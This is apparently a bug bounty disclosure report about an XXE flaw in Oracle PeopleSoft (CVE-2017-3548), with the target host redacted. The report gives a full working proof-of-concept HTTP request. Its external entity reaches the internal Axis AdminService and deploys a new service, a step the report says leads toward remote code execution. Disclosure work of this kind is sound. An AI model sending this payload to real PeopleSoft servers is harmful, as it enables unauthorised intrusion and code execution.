XXE with RCE potential on the https://█████████ (CVE-2017-3548)

##Description Hello. I was able to identify XXE on the https://███████ It is CVE in Oracle PeopleSoft (CVE-2017-3548) ##POC I determined that instance is available on localhost port 80, so it's possible to access `/pspc/services/AdminService` via XXE: ``` POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 Host: ████████ Content-Type: application/xml Content-Length: 608 <!DOCTYPE a PUBLIC "-//B/A/EN" "http://localhost:80/pspc/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22h1testservice%22+provider%3D%22java%3ARPC%22%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22org.apache.pluto.portalImpl.Deploy%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3C%2Fns1%3Adeployment"> ``` where `h1testservice` is test service name I'm trying to create. The result: ``` https://██████████/pspc/services/h1testservice ``` █████ I created new service on server. It's possible to go further like other researcher did in the #227880 but I don't think that dropping shell is necessary (since it's already proved that we can create our Apache Axis service. ##Suggested fix Patch Oracle PeopleSoft instance. ## Impact Remote code execution, internal network access.